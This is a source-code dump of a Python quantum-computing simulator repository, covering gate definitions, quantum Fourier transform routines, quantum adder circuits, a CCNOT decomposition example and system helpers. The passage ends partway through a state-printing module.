wxdlywy/nyasQuantumCalculate
https://github.com/wxdlywy/nyasQuantumCalculate
7730c97619b99f62d7eebb41c20ee2488a499ff9
0bf901302356168f61066d1037242036d6f416f8
771c45c2d3a5829dfc4d62fbd1660a60352a0674
refs/heads/main
2023-04-05T23:05:49.046039
2021-05-04T04:48:19
2021-05-04T04:48:19
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6546489596366882, "alphanum_fraction": 0.7229601740837097, "avg_line_length": 14.969696998596191, "blob_id": "862d6ee92712511bab7f052c162ba3cb0d933214", "content_id": "f06a564412816f3dd07155be37ac9e4a8bede86c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 527, "license_type": "no_license", "max_line_length": 34, "num_lines": 33, "path": "/examples/others/BreakDownCCNOT.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from nyasQuantumCalculate import *\n\nqbsys = QubitsSystem(3)\nq0 = qbsys[0]\nq1 = qbsys[1]\nq2 = qbsys[2]\n\nBuiltin.H(q0)\nBuiltin.H(q1)\nBuiltin.CCNOT(q0, q1, q2)\nDumpSystemText(qbsys)\n\nBuiltin.H(q2)\nBuiltin.CNOT(q1, q2)\nBuiltin.S(q2)\nBuiltin.T(q2)\nBuiltin.CNOT(q0, q2)\nBuiltin.T(q2)\nBuiltin.CNOT(q1, q2)\nBuiltin.S(q2)\nBuiltin.T(q2)\nBuiltin.CNOT(q0, q2)\nBuiltin.T(q2)\nBuiltin.H(q2)\nBuiltin.T(q1)\nBuiltin.CNOT(q0, q1)\nBuiltin.T(q0)\nBuiltin.S(q1)\nBuiltin.T(q1)\nBuiltin.CNOT(q0, q1)\nDumpSystemText(qbsys)\n\nBuiltin.RA(qbsys.getQubits())\n" }, { "alpha_fraction": 0.5099678635597229, "alphanum_fraction": 0.5252411365509033, "avg_line_length": 26.64444351196289, "blob_id": "c53e4cb2445f61a5612eeb4513ced8f0fa67e0e4", "content_id": "ede5dd1566a259975c0050d2a430d17a68ba5e0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6800, "license_type": "no_license", "max_line_length": 75, "num_lines": 225, "path": "/nyasQuantumCalculate/HighLevel/Add.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom nyasQuantumCalculate.Options import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\nfrom nyasQuantumCalculate.Operate import *\n\n\n__all__ = [\"Adder\", \"PhaseAdd\", \"IPhaseAdd\",\"Add\", \"IAdd\",\n \"PhaseAddInt\", \"IPhaseAddInt\", \"AddInt\", \"IAddInt\"]\n\n\ndef Adder(Cin: Qubit, A: Qubits, B: Qubits, Cout: Qubit) -> None:\n \"\"\"基本加法器\n\n |Cin❭|A❭|B❭|Cout❭ -> |Cin❭|A❭|mod(A+B,N)❭|Cout⊕floor(A+B/N)❭; N = 2^n\n\n 注意: 使用可逆计算逻辑运行的加法器, 中途会新增n-1个Qubits, 确保有足够的内存\n\n Args:\n Cin: 进位输入\n A: 第一个加数, A和B的长度必须都为n\n B: 第二个加数, 加法结果会储存在这里\n Cout: 进位输出\"\"\"\n if Options.inputCheck:\n if not inSameSystem(Cin, A, B, Cout):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) != len(B):\n raise ValueError(\"Length of A and B should be same.\")\n n = len(A)\n A_ = A if Options.littleEndian else A[::-1]\n B_ = B if Options.littleEndian else B[::-1]\n with TemporaryQubits(Cin.system, n - 1) as tmp:\n carries = Cin + tmp + Cout\n for index in range(n):\n q0 = carries[index]\n q1 = A_[index]\n q2 = B_[index]\n q3 = carries[index + 1]\n CCNOT(q1, q2, q3)\n CNOT(q1, q2)\n CCNOT(q0, q2, q3)\n CNOT(A_[-1], B_[-1])\n CNOT(carries[-2], B_[-1])\n CNOT(A_[-1], B_[-1])\n for index in range(n-2, -1, -1):\n q0 = carries[index]\n q1 = A_[index]\n q2 = B_[index]\n q3 = carries[index + 1]\n CCNOT(q0, q2, q3)\n CNOT(q1, q2)\n CCNOT(q1, q2, q3)\n CNOT(q0, q2)\n CNOT(q1, q2)\n\n\ndef PhaseAdd(A: Qubits, B: Qubits) -> None:\n \"\"\"把A作为相位加到B上\n\n Args:\n A: 加数, 长度为m\n B: 被加数, 长度为n, 并且n>=m\"\"\"\n if Options.inputCheck:\n if not inSameSystem(A, B):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) > len(B):\n raise ValueError(\"Length of A should not be greater than B's.\")\n m = len(A)\n n = len(B)\n n_m = n - m\n RotationGates.updateRs(n)\n A_ = A[::-1] if Options.littleEndian else A\n 
B_ = B[::-1] if Options.littleEndian else B\n for index in range(n):\n A_start = max(0, index - n_m)\n B_start = max(0, n_m - index)\n B_end = n - index\n for ctlQb, target in zip(A_[A_start:], B_[B_start:B_end]):\n Controlled(RotationGates.Rs[index], ctlQb.asQubits(), target)\n\n\ndef Add(A: Qubits, B: Qubits) -> None:\n \"\"\"计算A+B\n\n |A❭|B❭ -> |A❭|mod(A+B,N)❭; N = 2^n\n\n Args:\n A: 加数, 长度为m\n B: 被加数, 长度为n, 并且n>=m\"\"\"\n if Options.inputCheck:\n if not inSameSystem(A, B):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) > len(B):\n raise ValueError(\"Length of A should not be greater than B's.\")\n A_ = A[::-1] if Options.littleEndian else A\n B_ = B[::-1] if Options.littleEndian else B\n with TemporaryOptions.QFTswap(False):\n QFT(B_)\n with (TemporaryOptions.inputCheck(False),\n TemporaryOptions.littleEndian(False)):\n PhaseAdd(A_, B_)\n IQFT(B_)\n\n\ndef IPhaseAdd(A: Qubits, B: Qubits) -> None:\n \"\"\"计算PhaseAddd的逆\n\n Args:\n A: 加数, 长度为m\n B: 被加数, 长度为n, 并且n>=m\"\"\"\n if Options.inputCheck:\n if not inSameSystem(A, B):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) > len(B):\n raise ValueError(\"Length of A should not be greater than B's.\")\n m = len(A)\n n = len(B)\n n_m = n - m\n RotationGates.updateiRs(n)\n A_ = A[::-1] if Options.littleEndian else A\n B_ = B[::-1] if Options.littleEndian else B\n for index in range(n):\n A_start = max(0, index - n_m)\n B_start = max(0, n_m - index)\n B_end = n - index\n for ctlQb, target in zip(A_[A_start:], B_[B_start:B_end]):\n Controlled(RotationGates.iRs[index], ctlQb.asQubits(), target)\n\n\ndef IAdd(A: Qubits, B: Qubits) -> None:\n \"\"\"计算A+B的逆\n\n |A❭|A+B❭ -> |A❭|mod(B,N)❭; N = 2^n\n\n Args:\n A: 加数, 长度为m\n B: 被加数, 长度为n, 并且n>=m\"\"\"\n if Options.inputCheck:\n if not inSameSystem(A, B):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) > len(B):\n raise ValueError(\"Length of A should not be greater than B's.\")\n A_ = A[::-1] if Options.littleEndian else A\n B_ = B[::-1] if Options.littleEndian else B\n with TemporaryOptions.QFTswap(False):\n QFT(B_)\n with (TemporaryOptions.inputCheck(False),\n TemporaryOptions.littleEndian(False)):\n IPhaseAdd(A_, B_)\n IQFT(B_)\n\n\ndef PhaseAddInt(A: int, B: Qubits) -> None:\n \"\"\"把A作为相位加到B上\n\n Args:\n A: 加数, 长度小于等于n, 否则会被截断\n B: 被加数, 长度为n\"\"\"\n n = len(B)\n tag0 = 1 << n\n tag1 = tag0 - 1\n a_ = A & tag1\n B_ = B[::-1] if Options.littleEndian else B\n tag0 >>= 1\n for qb in B_:\n R1(a_ / tag0 * pi)(qb)\n tag1 >>= 1\n tag0 >>= 1\n a_ &= tag1\n\n\ndef AddInt(A: int, B: Qubits) -> None:\n \"\"\"计算A+B\n\n |B❭ -> |mod(A+B,N)❭; N = 2^n\n\n 因为加数不是量子位, 使用化简算法\n\n Args:\n A: 加数, 长度小于等于n, 否则会被截断\n B: 被加数, 长度为n\"\"\"\n B_ = B[::-1] if Options.littleEndian else B\n with TemporaryOptions.QFTswap(False):\n QFT(B_)\n with TemporaryOptions.littleEndian(False):\n PhaseAddInt(A, B_)\n IQFT(B_)\n\n\ndef IPhaseAddInt(A: int, B: Qubits) -> None:\n \"\"\"计算PhaseAddInt的逆\n\n Args:\n A: 加数, 长度小于等于n, 否则会被截断\n B: 被加数, 长度为n\"\"\"\n n = len(B)\n tag0 = 1 << n\n tag1 = tag0 - 1\n a_ = A & tag1\n B_ = B[::-1] if Options.littleEndian else B\n tag0 >>= 1\n for qb in B_:\n R1(a_ / tag0 * -pi)(qb)\n tag1 >>= 1\n tag0 >>= 1\n a_ &= tag1\n\n\ndef IAddInt(A: int, B: Qubits) -> None:\n \"\"\"计算A+B的逆\n\n |A+B❭ -> |mod(B,N)❭; N = 2^n\n\n 因为加数不是量子位, 使用化简算法\n\n Args:\n A: 加数, 长度小于等于n, 否则会被截断\n B: 被加数, 长度为n\"\"\"\n B_ = B[::-1] if Options.littleEndian else B\n with TemporaryOptions.QFTswap(False):\n QFT(B_)\n with TemporaryOptions.littleEndian(False):\n 
IPhaseAddInt(A, B_)\n    IQFT(B_)\n" }, { "alpha_fraction": 0.5356047749519348, "alphanum_fraction": 0.5508233904838562, "avg_line_length": 31.732341766357422, "blob_id": "f58d783b1752ca021f1dcda0c22ff8c13bbb240f", "content_id": "ce8a759c3c0ccd1d66661677eaece0b2c0ceb045", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9033, "license_type": "no_license", "max_line_length": 80, "num_lines": 269, "path": "/nyasQuantumCalculate/Operate/QFT.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom .QubitsOperation import *\nfrom .Swap import *\nfrom .SingleQubitGate import *\nfrom .ControlMethod import *\nfrom nyasQuantumCalculate.Options import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"QFT\", \"IQFT\", \"AQFT\", \"IAQFT\"]\n\n\ndef QFT_gate(qbs: Qubits) -> None:\n    n = len(qbs)\n    if n == 0:\n        return\n    if n == 1:\n        H(qbs[0])\n        return\n    RotationGates.updateRs(n)\n    for idx0, qb in enumerate(qbs):\n        H(qb)\n        for idx1, ctlQb in enumerate(qbs[idx0 + 1:]):\n            Controlled(RotationGates.Rs[idx1 + 1], ctlQb.asQubits(), qb)\n    if Options.QFTswap:\n        for idx in range(n // 2):\n            SWAP(qbs[idx], qbs[-(idx + 1)])\n\n\ndef iQFT_gate(qbs: Qubits) -> None:\n    n = len(qbs)\n    if n == 0:\n        return\n    if n == 1:\n        H(qbs[0])\n        return\n    RotationGates.updateiRs(n)\n    if Options.QFTswap:\n        for idx in range(n // 2):\n            SWAP(qbs[idx], qbs[-(idx + 1)])\n    for idx0, qb in enumerate(qbs[::-1]):\n        for idx1, ctlQb in enumerate(qbs[n - idx0:]):\n            Controlled(RotationGates.iRs[idx1 + 1], ctlQb.asQubits(), qb)\n        H(qb)\n\n\ndef QFT_numpy(qbs: Qubits) -> None:\n    if len(qbs) == 0:\n        return\n    qbsys = qbs.system\n    qbs_indexes = [qbsys.statesNdIndex(index) for index in qbs.indexes]\n    indexesR = qbs_indexes + [index for index in range(qbsys.nQubits)\n                              if index not in qbs_indexes]\n    indexes = list(range(qbsys.nQubits))\n    for index0, index1 in enumerate(indexesR):\n        indexes[index1] = index0\n    controlling = (..., *([1] * qbsys.nControllingQubits))\n    states = qbsys.statesNd. \\\n        transpose(indexesR). 
\\\n reshape([-1] + [2] * (qbsys.nQubits - len(qbs))).copy()\n after: np.ndarray = 2 ** (-len(qbs) / 2) * \\\n np.fft.fft(states.__getitem__(controlling), axis=0)\n states.__setitem__(controlling, after)\n qbsys.statesNd *= 0.\n qbsys.statesNd += states.reshape([2] * qbsys.nQubits).transpose(indexes)\n\n\nclass _QFT(QubitsOperation):\n \"\"\"量子傅里叶变换\n\n To use:\n >>> qbsys = QubitsSystem(2)\n >>> qbs = qbsys.getQubits()\n >>> ApplyToEach(X, qbs)\n >>> qbsys.states\n array([[0.+0.j],\n [0.+0.j],\n [0.+0.j],\n [1.+0.j]])\n >>> QFT(qbs)\n >>> qbsys.states\n array([[ 5.000000e-01+0.j ],\n [-5.000000e-01+0.j ],\n [-3.061617e-17-0.5j],\n [ 3.061617e-17+0.5j]])\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"QFT\"\n self.trackable = True\n self.controllable = True\n\n def call(self, qbs: Qubits) -> None:\n if Options.QFTwithNumpy:\n QFT_numpy(qbs)\n else:\n QFT_gate(qbs)\n\n def __call__(self, qbs: Qubits) -> None:\n if Options.inputCheck:\n if any(isControllingQubits(qbs)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if qbs.haveSameQubit():\n raise ValueError(\"QFT cannot operate multiple same qubits.\")\n sysStopTrack = qbs.system.stopTracking\n if qbs.system.canTrack() and self.trackable:\n qbs.system.addTrack(self.name, *qbs.indexes)\n qbs.system.stopTracking = True\n self.call(qbs)\n if not sysStopTrack:\n qbs.system.stopTracking = False\n\n\nclass _iQFT(QubitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"iQFT\"\n self.trackable = True\n self.controllable = True\n\n def call(self, qbs: Qubits) -> None:\n if Options.QFTwithNumpy:\n iQFT_numpy(qbs)\n else:\n iQFT_gate(qbs)\n\n def __call__(self, qbs: Qubits) -> None:\n if Options.inputCheck:\n if any(isControllingQubits(qbs)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if qbs.haveSameQubit():\n raise ValueError(\"QFT cannot operate multiple same qubits.\")\n sysStopTrack = qbs.system.stopTracking\n if qbs.system.canTrack() and self.trackable:\n qbs.system.addTrack(self.name, *qbs.indexes)\n qbs.system.stopTracking = True\n self.call(qbs)\n if not sysStopTrack:\n qbs.system.stopTracking = False\n\n\nclass _AQFT(QubitsOperation):\n \"\"\"近似量子傅里叶变换\n\n 比起QFT, AQFT在存在退相干时精度更高, 并且需要的位门更少. 输入m(int)\n 是控制AQFT精度的参数, m只能大于0小于等于输入qbs的长度. 
当\n m=1时, 即是Hadamard变换, m=输入qbs长度即为QFT.\n\n 注意: AQFT是由位门实现的, 而在这里QFT提供numpy实现, 在很多量子位\n 的情况下numpy实现的QFT比位门实现的AQFT要快很多倍.\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"AQFT\"\n self.trackable = True\n self.controllable = True\n\n def call(self, qbs: Qubits, m: int) -> None:\n n = len(qbs)\n if n == 0:\n return\n if n == 1:\n H(qbs[0])\n return\n RotationGates.updateRs(n)\n for idx0, qb in enumerate(qbs):\n H(qb)\n for idx1, ctl in enumerate(qbs[idx0 + 1: min(idx0 + m, len(qbs))]):\n Controlled(RotationGates.Rs[idx1 + 1], ctl.asQubits(), qb)\n if Options.QFTswap:\n for idx in range(len(qbs) // 2):\n SWAP(qbs[idx], qbs[-(idx + 1)])\n\n def __call__(self, qbs: Qubits, m: int) -> None:\n if Options.inputCheck:\n if m <= 0 or m > len(qbs):\n raise ValueError(\"'m' should be greater than 0 and \"\n \"lower or equal to len(qbs)\")\n if any(isControllingQubits(qbs)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if qbs.haveSameQubit():\n raise ValueError(\"QFT cannot operate multiple same qubits.\")\n sysStopTrack = qbs.system.stopTracking\n if qbs.system.canTrack() and self.trackable:\n qbs.system.addTrack(self.name + f\"_{m}\", *qbs.indexes)\n qbs.system.stopTracking = True\n self.call(qbs, m)\n if not sysStopTrack:\n qbs.system.stopTracking = False\n\n\nclass _iAQFT(QubitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"iAQFT\"\n self.trackable = True\n self.controllable = True\n\n def call(self, qbs: Qubits, m: int) -> None:\n n = len(qbs)\n if n == 0:\n return\n if n == 1:\n H(qbs[0])\n return\n RotationGates.updateiRs(n)\n for idx0, qb in enumerate(qbs):\n H(qb)\n for idx1, ctl in enumerate(qbs[idx0 + 1: min(idx0 + m, len(qbs))]):\n Controlled(RotationGates.iRs[idx1 + 1], ctl.asQubits(), qb)\n if Options.QFTswap:\n for idx in range(len(qbs) // 2):\n SWAP(qbs[idx], qbs[-(idx + 1)])\n\n def __call__(self, qbs: Qubits, m: int) -> None:\n if Options.inputCheck:\n if m <= 0 or m > len(qbs):\n raise ValueError(\"'m' should be greater than 0 and \"\n \"lower or equal to len(qbs)\")\n if any(isControllingQubits(qbs)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if qbs.haveSameQubit():\n raise ValueError(\"QFT cannot operate multiple same qubits.\")\n sysStopTrack = qbs.system.stopTracking\n if qbs.system.canTrack() and self.trackable:\n qbs.system.addTrack(self.name + f\"_{m}\", *qbs.indexes)\n qbs.system.stopTracking = True\n self.call(qbs, m)\n if not sysStopTrack:\n qbs.system.stopTracking = False\n\n\nQFT = _QFT()\nIQFT = _iQFT()\n\nAQFT = _AQFT()\nIAQFT = _iAQFT()\n" }, { "alpha_fraction": 0.5031394362449646, "alphanum_fraction": 0.5237531065940857, "avg_line_length": 32.3636360168457, "blob_id": "8eb27908573b3e67ecbb56f37d854d0e77fa3b30", "content_id": "7732fa8c884557db3d86f038e41d09018465ec0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8887, "license_type": "no_license", "max_line_length": 79, "num_lines": 253, "path": "/nyasQuantumCalculate/Operate/SingleQubitGate.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any, List\n\nimport numpy as np\n\nfrom .QubitsOperation import *\nfrom nyasQuantumCalculate.Options import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"SingleQubitGate\", \"Rx\", \"Ry\", \"Rz\", \"R1\", \"Phase\", \"RotationGates\",\n \"I\", \"H\", \"X\", \"Y\", \"Z\", 
\"S\", \"T\", \"SR\", \"TR\"]\n\n\nclass SingleQubitGate(QubitsOperation):\n \"\"\"SingleQubitGate(complex, complex, complex, complex, str, **)\n\n 单量子位门必须是酉矩阵, 初始化前可以使用`SingleQubitGate.checkUnitGate`\n 检查4个数字是否组成单量子位门. 输入参数`name`可以定义门的名字以方便跟踪. 并且\n 被作用单量子位门的量子位不能是控制位.\n\n Attributes:\n matrix: 单量子位门里的矩阵\n \"\"\"\n\n def __init__(self,\n a: complex, b: complex,\n c: complex, d: complex,\n name: str = \"\",\n **kwargs: Any) -> None:\n if not kwargs.get(\"_notCheck\", False) and \\\n not self.checkUnitGate(a, b, c, d):\n raise ValueError(\"Input parameters cannot build a qubit gate.\")\n super().__init__()\n self.name = name\n self.controllable = True\n self.trackable = True\n self._isBuiltin = kwargs.get(\"_isBuiltin\", False)\n self.matrix = np.array(((a, b), (c, d)), np.complex128)\n\n def copy(self) -> \"SingleQubitGate\":\n new = SingleQubitGate(0., 0., 0., 0., _notCheck=True)\n new.name = self.name\n new.controllable = self.controllable\n self.trackable = self.trackable\n new.matrix = self.matrix.copy()\n return new\n\n @staticmethod\n def checkUnitGate(a: complex, b: complex, c: complex, d: complex) -> bool:\n \"\"\"检查参数是否可以组成单量子位门\n\n Args:\n a: 矩阵里左上元素\n b: 矩阵里右上元素\n c: 矩阵里左下元素\n d: 矩阵里右下元素\n\n Returns:\n True为可以组成单量子位门\"\"\"\n absA = np.square(np.abs(a))\n absB = np.square(np.abs(b))\n absC = np.square(np.abs(c))\n absD = np.square(np.abs(d))\n return equal0(np.abs(a * np.conj(c) + b * np.conj(d))) and \\\n equal0(np.abs(a * np.conj(b) + c * np.conj(d))) and \\\n equal0(absA + absB - 1.) and equal0(absA + absC - 1.) and \\\n equal0(absD + absB - 1.) and equal0(absD + absC - 1.)\n\n def __str__(self) -> str:\n return f\"{self.name} Gate\"\n\n def __repr__(self) -> str:\n (a, b), (c, d) = self.matrix\n return f\"{self.name}[{a:.2f} {b:.2f}; {c:.2f} {d:.2f}]\"\n\n def call(self, qb: Qubit) -> None:\n qbsys = qb.system\n m = self.matrix\n controlling0 = (0, ..., *([1] * qbsys.nControllingQubits))\n controlling1 = (1, ..., *([1] * qbsys.nControllingQubits))\n states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(qb.index))\n new0 = states.__getitem__(controlling0).copy()\n if m[0, 1] == 0.:\n new0 *= m[0, 0]\n else:\n new0 *= m[0, 0] / m[0, 1]\n new0 += states.__getitem__(controlling1)\n new0 *= m[0, 1]\n new1 = states.__getitem__(controlling0).copy()\n if m[1, 1] == 0.:\n new1 *= m[1, 0]\n else:\n new1 *= m[1, 0] / m[1, 1]\n new1 += states.__getitem__(controlling1)\n new1 *= m[1, 1]\n states.__setitem__(controlling0, new0)\n states.__setitem__(controlling1, new1)\n if Options.autoNormalize:\n qbsys.normalize()\n\n def __call__(self, qb: Qubit) -> None:\n qbsys = qb.system\n if Options.inputCheck and qbsys.isControlling(qb.index):\n raise ValueError(\"受控过程作用在控制位上\")\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, qb.index)\n qbsys.stopTracking = True\n self.call(qb)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n def __imul__(self, s: complex) -> \"SingleQubitGate\":\n if self._isBuiltin:\n raise NotImplementedError(\"The built-in gate cannot be modified.\")\n if not equal0(np.abs(s) - 1.):\n raise ValueError(\"The norm of the scalar multiplication\"\n \" must equal to 1.\")\n self.matrix *= s\n return self\n\n def __mul__(self, s: complex) -> \"SingleQubitGate\":\n new = SingleQubitGate(0., 0., 0., 0., _notCheck=True)\n new.matrix = self.matrix.copy()\n return new.__imul__(s)\n\n def __rmul__(self, s: complex) -> \"SingleQubitGate\":\n return self.__mul__(s)\n\n def __matmul__(self, right: \"SingleQubitGate\") -> 
\"SingleQubitGate\":\n new = SingleQubitGate(0., 0., 0., 0., _notCheck=True)\n new.matrix = self.matrix @ right.matrix\n return new\n\n def __ipow__(self, n: complex) -> \"SingleQubitGate\":\n if self._isBuiltin:\n raise NotImplementedError(\"The built-in gate cannot be modified.\")\n v, Q = np.linalg.eig(self.matrix)\n self.matrix *= 0\n self.matrix += Q @ np.diag(v ** n) @ np.linalg.inv(Q)\n return self\n\n def __pow__(self, n: complex) -> \"SingleQubitGate\":\n new = SingleQubitGate(0., 0., 0., 0., _notCheck=True)\n new.matrix = self.matrix.copy()\n return new.__ipow__(n)\n\n\n###############################################################################\n############################ Built-in Gates #################################\n###############################################################################\nrsqrt2 = 1. / np.sqrt(2.)\n\n\nI = SingleQubitGate(1., 0., 0., 1.,\n _notCheck=True, _isBuiltin=True, name='I')\nI.trackable = False\n\nH = SingleQubitGate(rsqrt2, rsqrt2, rsqrt2, -rsqrt2,\n _notCheck=True, _isBuiltin=True, name='H')\n\nX = SingleQubitGate(0., 1., 1., 0.,\n _notCheck=True, _isBuiltin=True, name='X')\n\nY = SingleQubitGate(0., -1.j, 1.j, 0.,\n _notCheck=True, _isBuiltin=True, name='Y')\n\nZ = SingleQubitGate(1., 0., 0., -1.,\n _notCheck=True, _isBuiltin=True, name='Z')\n\nS = SingleQubitGate(1., 0., 0., 1.j,\n _notCheck=True, _isBuiltin=True, name='S')\n\nSR = SingleQubitGate(1., 0., 0., -1.j,\n _notCheck=True, _isBuiltin=True, name='S^-1')\n\nT = SingleQubitGate(1., 0., 0., rsqrt2 + 1j*rsqrt2,\n _notCheck=True, _isBuiltin=True, name='T')\n\nTR = SingleQubitGate(1., 0., 0., rsqrt2 - 1j*rsqrt2,\n _notCheck=True, _isBuiltin=True, name='T^-1')\n\n\ndef Rx(theta: float) -> SingleQubitGate:\n a = np.cos(theta / 2.)\n b = -1j * np.sin(theta / 2.)\n return SingleQubitGate(a, b, b, a,\n _notCheck=True, name=f\"Rx({theta:.4f})\")\n\n\ndef Ry(theta: float) -> SingleQubitGate:\n a = np.cos(theta / 2.)\n b = np.sin(theta / 2.)\n return SingleQubitGate(a, -b, b, a,\n _notCheck=True, name=f\"Ry({theta:.4f})\")\n\n\ndef Rz(theta: float) -> SingleQubitGate:\n a = np.cos(theta / 2.)\n b = 1j * np.sin(theta / 2.)\n return SingleQubitGate(a - b, 0., 0., a + b,\n _notCheck=True, name=f\"Rz({theta:.4f})\")\n\n\ndef R1(theta: float) -> SingleQubitGate:\n \"\"\"|1❭相位旋转门, 实际上 R1(theta) = Phase(theta/2) @ Rz(theta)\"\"\"\n return SingleQubitGate(1., 0., 0., np.exp(1j * theta),\n _notCheck=True, name=f\"R1({theta:.4f})\")\n\n\ndef Phase(theta: float) -> SingleQubitGate:\n ph = np.exp(1j * theta)\n return SingleQubitGate(ph, 0., 0., ph,\n _notCheck=True, name=f\"Ph({theta:.4f})\")\n\n\nclass RotationGates:\n \"\"\"RotationGates(x)\n\n 这个类不应该被初始化.\n\n 用于管理QFT和Add等地方使用的旋转门, 通过`Rs`和`iRs`的索引可以获取相应的门. 比如\n `RotationGates.Rs[4]` 可以获取 `R1(2*pi/2**4)` 而`iRs`是`Rs`的逆门. 
    \"\"\"\n    Rs: List[SingleQubitGate] = list()\n    iRs: List[SingleQubitGate] = list()\n\n    @staticmethod\n    def R(n: int) -> SingleQubitGate:\n        gate = R1(pi / (1 << (n - 1)))\n        gate.name = f\"R_{n}\"\n        return gate\n\n    @staticmethod\n    def iR(n: int) -> SingleQubitGate:\n        \"\"\"Phase gate used in the iQFT\"\"\"\n        gate = R1(-pi / (1 << (n - 1)))\n        gate.name = f\"iR_{n}\"\n        return gate\n\n    @classmethod\n    def updateRs(cls, n: int) -> None:\n        if n > len(cls.Rs):\n            cls.Rs += [cls.R(i) for i in range(len(cls.Rs) + 1, n + 1)]\n\n    @classmethod\n    def updateiRs(cls, n: int) -> None:\n        if n > len(cls.iRs):\n            cls.iRs += [cls.iR(i) for i in range(len(cls.iRs) + 1, n + 1)]\n" }, { "alpha_fraction": 0.5902021527290344, "alphanum_fraction": 0.5964230298995972, "avg_line_length": 27.577777862548828, "blob_id": "b0ca89bf35539138d080d0f32e02d11513425c77", "content_id": "4f494c761c1c984dcfaedf8112b0176cf5edf033", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1378, "license_type": "no_license", "max_line_length": 77, "num_lines": 45, "path": "/nyasQuantumCalculate/System/__init__.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Union as _U, List as _L\n\nfrom .Dump import *\nfrom .Qubits import *\nfrom .Qubit import *\nfrom .QubitsSystem import *\n\n\ndef inSameSystem(*args: _U[Qubit, Qubits, QubitsSystem]) -> bool:\n    \"\"\"Check whether all inputs belong to the same qubits system\"\"\"\n    ele0 = args[0]\n    id = (ele0 if isinstance(ele0, QubitsSystem) else ele0.system).id\n    for ele in args[1:]:\n        if (ele if isinstance(ele, QubitsSystem) else ele.system).id != id:\n            return False\n    return True\n\n\ndef isControllingQubits(*args: _U[Qubit, Qubits]) -> _L[bool]:\n    \"\"\"Check whether the input qubits are controlling qubits (this method\n    does not check that they share a system)\"\"\"\n    res: _L[bool] = list()\n    qbsys = args[0].system\n    for ele in args:\n        if isinstance(ele, Qubit):\n            res.append(qbsys.isControlling(ele.index))\n            continue\n        res += [qbsys.isControlling(index) for index in ele.indexes]\n    return res\n\n\ndef haveSameQubit(*args: _U[Qubit, Qubits]) -> bool:\n    tmp: _L[int] = list()\n    for ele in args:\n        if isinstance(ele, Qubit):\n            index = ele.index\n            if index in tmp:\n                return True\n            tmp.append(index)\n            continue\n        if any(index in tmp for index in ele.indexes) or ele.haveSameQubit():\n            return True\n        tmp += ele.indexes\n    return False\n" }, { "alpha_fraction": 0.5678327679634094, "alphanum_fraction": 0.592576801776886, "avg_line_length": 30.675676345825195, "blob_id": "d1862eeef120bfa7a861b4fbc8ae021c5d58bc6f", "content_id": "226157534b3158e789c1d91678dc4d612b1fa155", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2454, "license_type": "no_license", "max_line_length": 79, "num_lines": 74, "path": "/nyasQuantumCalculate/System/Dump.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom nyasQuantumCalculate.Utils import *\nfrom .QubitsSystem import *\n\nhave_matplotlib: bool = True\ntry:\n    from matplotlib import pyplot as plt\nexcept ModuleNotFoundError:\n    have_matplotlib = False\n\n\n__all__ = [\"DumpSystemText\", \"DumpSystemFig\", \"have_matplotlib\"]\n\n\nlog10_2: float = np.log10(2.)\n\n\ndef DumpSystemText(qbsys: QubitsSystem) -> None:\n    \"\"\"Print every state of the system as text\n\n    Args:\n        qbsys: the system to inspect\n
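\n    To use (a sketch; one line is printed per basis state, showing the\n    amplitude, a probability bar and the phase in radians):\n    >>> qbsys = QubitsSystem(1)\n    >>> DumpSystemText(qbsys)  # doctest: +SKIP\n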
